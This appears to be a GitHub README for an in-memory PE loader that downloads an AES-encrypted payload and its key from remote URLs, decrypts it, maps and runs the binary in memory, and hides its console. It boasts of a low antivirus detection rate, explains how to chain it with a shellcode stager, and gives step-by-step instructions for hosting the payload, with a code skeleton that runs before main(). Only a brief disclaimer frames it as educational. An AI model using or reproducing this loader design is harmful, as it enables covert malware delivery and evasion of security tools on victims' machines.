A sophisticated portable executable (PE) loader that leverages AES encryption and remote payload fetching to bypass traditional detection methods. This loader demonstrates advanced techniques for executing native x64 binaries in memory while minimizing detection signatures.
This PE loader uses several innovative techniques to avoid detection:
- 🔒 AES Encryption: Payloads are encrypted with AES-256 for secure transmission and obfuscation
- 🌐 Remote Component Fetching: Decryption key and encrypted payload are fetched from separate URLs
- 🏗️ Constructor Execution: The payload executes via a class constructor before
main()is called - 🖥️ Console Removal:
FreeConsole()detaches from the current console window - 🧠 In-Memory Execution: Entire PE file is loaded and executed directly from memory
- 🔧 IAT Repair: Automatically repairs Import Address Table in memory
- 🛡️ API Obfuscation: Uses
EnumThreadWindowsfor execution instead of more common APIs
Current detection: 1/36 (as reported by KleenScan)
- One detection marked as "Unknown"
The loader employs several advanced evasion techniques:
- 🏗️ Constructor Execution: The
initclass constructor runs beforemain() - 🖥️ Console Removal:
FreeConsole()detaches from the current console window - 🌐 Remote Fetching: Downloads both encrypted payload and decryption key from separate URLs
- 🔓 AES-256 Decryption: Decrypts the payload using Windows CryptoAPI
- 🧠 PE Loading: Maps the PE into memory and handles relocations
- 🔧 IAT Repair: Rebuilds the Import Address Table by resolving all imports
- ⚡ Execution: Uses
EnumThreadWindowsto execute the entry point
This PE loader works exceptionally well when combined with my shellcode-stealth project. Together they provide:
- 🔄 Two-Stage Loading: Use shellcode-stealth as first stage to load this PE loader
- 📦 Native x64 Execution: Execute full native x64 binaries instead of just shellcode
- 🎯 Reduced Detection: Separate components across multiple stages
- 🔒 Enhanced Obfuscation: Combine Base32 encoding with AES encryption
Compile your x64 native binary or use an existing executable.
Use the provided aes_encrypt.py script to encrypt your binary:
python aes_encrypt.py <file.exe>This will generate two files:
cipher.bin(encrypted payload)key.bin(decryption key)
Upload both files to your web server:
- Host
cipher.binat:<domain>/encrypted_payload.bin - Host
key.binat:<domain>/decryption_key.bin
Update the URLs in the code:
std::wstring cipher_url = oxorany(L"<domain>/encrypted_payload.bin");
std::wstring key_url = oxorany(L"<domain>/decryption_key.bin");Open the project in Visual Studio and build as x64 release!
The payload executes through the init class constructor, which runs before the main() function:
class init {
public:
init() {
FreeConsole();
// download, decrypt and execute
}
};
// create instance which triggers execution before main
init x;
int main() {
return 0; // never executes
}- 📦 Download Components: Fetches both encrypted payload and decryption key
- 🔓 AES Decryption: Uses Windows CryptoAPI for AES-256 decryption
- 🧠 Memory Allocation: Allocates memory at preferred image base or random address
- 🗂️ PE Mapping: Copies PE headers and sections to their proper locations
- 🔧 IAT Repair: Resolves all imports and fixes the Import Address Table
- ⚡ Execution: Calls the entry point via
EnumThreadWindows
This loader specifically supports x64 NATIVE binaries with proper:
- ✅ Relocation handling
- ✅ Import resolution
- ✅ Memory permission management
- ✅ Exception directory support (if present)
- Windows OS (x64)
- C++ Compiler (Visual Studio recommended)
- Python 3 (for aes_encrypt.py)
- Web server (for hosting encrypted components)
This tool is for educational and research purposes only. Use only on systems you own or have explicit permission to test. The authors are not responsible for any misuse of this tool.
This project is provided for educational purposes only.
⭐ If you find this project useful, please consider giving it a star on GitHub!